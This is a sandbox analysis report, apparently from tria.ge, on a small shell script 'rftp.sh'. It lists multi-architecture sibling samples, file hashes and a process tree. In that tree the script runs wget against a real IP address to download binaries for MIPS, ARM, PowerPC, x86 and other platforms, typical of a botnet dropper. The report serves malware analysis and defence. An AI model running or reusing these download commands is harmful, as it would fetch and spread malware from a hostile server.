Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

tmp/bluarm

debian-9-armhf

tmp/blui686

ubuntu-18.04-amd64

tmp/blumips

debian-9-mips

tmp/blumips64

debian-9-mips

tmp/blumipsel

debian-9-mipsel

tmp/bluppc

ubuntu-18.04-amd64

tmp/bluppc

debian-9-armhf

tmp/bluppc

debian-9-mips

tmp/bluppc

debian-9-mipsel

tmp/blush

ubuntu-18.04-amd64

tmp/blush

debian-9-armhf

tmp/blush

debian-9-mips

tmp/blush

debian-9-mipsel

tmp/blux86

ubuntu-18.04-amd64

7

tmp/rftp.sh

ubuntu-18.04-amd64

5

tmp/rftp.sh

debian-9-armhf

5

tmp/rftp.sh

debian-9-mips

5

tmp/rftp.sh

debian-9-mipsel

5

Analysis

  • max time kernel
    0s
  • max time network
    103s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    03/10/2022, 01:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tmp/rftp.sh

  • Size

    543B

  • MD5

    14dcef3dd4cc163cda3acafdce3e1855

  • SHA1

    2fa79835d19bb0021fa3687b21d05600f2dbef95

  • SHA256

    c20d42369a607ef0dd0853b7cb9e633a5fa874b2403fb8bcd020f167a5466e67

  • SHA512

    dc845248446f25e6558d295191aad2a5a2c433b3dc711e12812a258b08381fa167f3c45fe125385f5068acab3ae751bf67ab96d8664c008a02083ab5fde90e42

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tmp/rftp.sh
    /tmp/tmp/rftp.sh
    1⤵
    • Writes file to tmp directory
    PID:577
    • /usr/bin/wget
      wget http://93.174.93.187/blumips
      2⤵
        PID:578
      • /usr/bin/wget
        wget http://93.174.93.187/blumips64
        2⤵
          PID:579
        • /usr/bin/wget
          wget http://93.174.93.187/blumipsel
          2⤵
            PID:580
          • /usr/bin/wget
            wget http://93.174.93.187/bluarm
            2⤵
              PID:581
            • /usr/bin/wget
              wget http://93.174.93.187/blush
              2⤵
                PID:582
              • /usr/bin/wget
                wget http://93.174.93.187/bluppc
                2⤵
                  PID:583
                • /usr/bin/wget
                  wget http://93.174.93.187/blui686
                  2⤵
                    PID:584
                  • /usr/bin/wget
                    wget http://93.174.93.187/blux86
                    2⤵
                      PID:585

                  Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads